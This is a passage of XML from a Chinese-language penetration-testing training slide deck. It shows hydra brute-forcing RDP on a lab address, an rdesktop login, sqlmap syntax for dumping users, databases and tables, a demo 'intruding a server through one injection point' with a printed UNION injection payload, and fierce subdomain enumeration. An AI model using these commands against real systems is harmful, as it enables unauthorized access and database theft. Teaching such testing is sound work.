            <a:ext cx="4947286"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接着就能直接登录XP进行远程控制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="576" name="Shape 576"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="729334" y="7112486"/>
            <a:ext cx="849813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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>rdesktop -a 32 -u sysorem -p 12345 172.16.211.129:3389</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="577" name="Shape 577"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="745134" y="1225549"/>
            <a:ext cx="8562002"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>hydra 172.16.211.129 rdp -l sysorem -P Desktop/pass.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide8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79" name="image82.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="127695" y="1017924"/>
            <a:ext cx="13232010" cy="8270008"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="580" name="Shape 580"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4076700" y="283438"/>
            <a:ext cx="3042285"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进行远程控制XP系统</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide8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2" name="Shape 582"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5327650" y="504361"/>
            <a:ext cx="1733123" cy="571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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="3100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SQLmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="583" name="Shape 583"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="393662" y="1600199"/>
            <a:ext cx="12217476" cy="551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500"/>
            </a:pPr>
            <a:r>
              <a:t>  sqlmap是一个自动化的SQL注入工具，其主要功能是扫描，发现并利用给定的URL的SQL注入漏洞，目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术，分别是：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>   1）基于布尔的盲注，即可以根据返回页面判断条件真假的注入。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>   2）基于时间的盲注，即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>   3）基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回在页面中。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>   4）联合查询注入，可以使用union的情况下的注入。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>   5）堆查询注入，可以同时执行多条语句的执行时的注入。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="584" name="Shape 584"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="482600" y="8636000"/>
            <a:ext cx="1943100"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实例演示</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="585" name="Shape 585"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2392806" y="8727612"/>
            <a:ext cx="8770538"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>实例演示通过一个注入点入侵一台服务器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="586" name="Shape 586"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534959" y="7550150"/>
            <a:ext cx="10287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概要</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="587" name="Shape 587"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1805932" y="7636337"/>
            <a:ext cx="9392936"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>常用语法简单介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide8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9" name="Shape 589"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4870450" y="459911"/>
            <a:ext cx="2476500"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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="3100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>常用语法介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="590" name="Shape 590"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767927" y="1689100"/>
            <a:ext cx="11468946" cy="6578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500"/>
            </a:pPr>
            <a:r>
              <a:t>#获取当前用户名称</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>sqlmap -u "http://url/news?id=1" --current-user </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>#获取当前数据库名称</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>sqlmap -u "http://www.xxoo.com/news?id=1" —current-db</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>#列表名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>sqlmap -u "http://www.xxoo.com/news?id=1" --tables -D “db_name”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>#列字段</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>sqlmap -u "http://url/news?id=1" --columns -T "tablename" users-D "db_name" -v 0 #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>#获取字段内容</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>sqlmap -u "http://url/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide8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2" name="Shape 592"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="927099" y="561512"/>
            <a:ext cx="582930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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>实例演示通过一个注入点入侵一台服务器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="593" name="Shape 593"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996950" y="1298112"/>
            <a:ext cx="2883535"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#目标网站：某CMS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="594" name="image83.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1750412" y="2157230"/>
            <a:ext cx="9503976" cy="6886939"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide8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6" name="Shape 596"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755648" y="523411"/>
            <a:ext cx="283083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#测试是否存在注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="597" name="Shape 597"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="958850" y="1113962"/>
            <a:ext cx="10913796"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>sqlmap -u "http://xxx/newsInfo.php?news_id=1&amp;classsn=8001" --level 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="598" name="Shape 598"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1035049" y="6293775"/>
            <a:ext cx="11265448" cy="162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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>news_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b766271,0x5a794e4d4a626f5857704c4959506c49507a58666b4c44717864664b596d586d797059515752464d,0x716a786b71),NULL,NULL-- PHML&amp;classsn=9003</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="599" name="Shape 599"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="704849" y="5597986"/>
            <a:ext cx="143764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#Payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="600" name="image84.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="736671" y="1956491"/>
            <a:ext cx="11983491" cy="3153550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide8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2" name="Shape 602"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717550" y="1015999"/>
            <a:ext cx="6377306"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#查询数据库所属用户，返回ht_zhengke20%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="603" name="Shape 603"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819150" y="1571162"/>
            <a:ext cx="11829554"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>sqlmap -u “http://xxx/newsInfo.php?news_id=1&amp;classsn=8001” --current-user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="604" name="Shape 604"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="781049" y="5613399"/>
            <a:ext cx="5053649"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#查询是否是管理员账户，返回true </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="605" name="Shape 605"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="882649" y="6168561"/>
            <a:ext cx="11070687"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>sqlmap -u “http://xxx/newsInfo.php?news_id=1&amp;classsn=8001”  --is-dba </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="606" name="image85.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1322955" y="2302730"/>
            <a:ext cx="10106478" cy="3103440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="607" name="image86.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1289239" y="6861210"/>
            <a:ext cx="10106478" cy="1784427"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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 name="Shape 180"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="527049" y="501649"/>
            <a:ext cx="1993901" cy="76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lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>域名枚举</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Shape 181"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742950" y="1479549"/>
            <a:ext cx="10123937" cy="101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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>在得到主域名信息之后，如果能通过主域名得到所有子域名信息，再通过子域名查询其对应的主机IP，这样我们能得到一个较为完整的信息。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Shape 182"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812005" y="2813050"/>
            <a:ext cx="5970589"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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>使用fierse工具，可以进行域名列表查询：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="Shape 183"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="854985" y="3689349"/>
            <a:ext cx="3801828"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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>fierce -dns domainName</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Shape 184"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1050553" y="8820150"/>
            <a:ext cx="10903695"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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>除fierse之外，dnsdict6、dnsenum、dnsmap都可以进行域名枚举。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="185" name="image10.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1257300" y="1808807"/>
            <a:ext cx="9895224" cy="6466186"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="186" name="image11.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="8972931">
            <a:off x="5420741" y="5438828"/>
            <a:ext cx="4451396" cy="457906"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide9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09" name="image87.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="735023" y="2250612"/>
            <a:ext cx="10809277" cy="3879453"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="610" name="Shape 610"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717550" y="1015999"/>
            <a:ext cx="1560830"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#列数据库</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="611" name="Shape 611"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717550" y="1571162"/>
            <a:ext cx="10523743"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>sqlmap -u “http://xxx/newsInfo.php?news_id=1&amp;classsn=8001” --dbs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="612" name="Shape 612"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717548" y="6565900"/>
            <a:ext cx="219583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#列数据库用户</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="613" name="image88.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="849941" y="7712936"/>
            <a:ext cx="10579442" cy="1639621"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="614" name="Shape 614"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="736402" y="7070262"/>
            <a:ext cx="10806517"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>sqlmap -u “http://xxx/newsInfo.php?news_id=1&amp;classsn=8001” --users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide9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16" name="image89.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
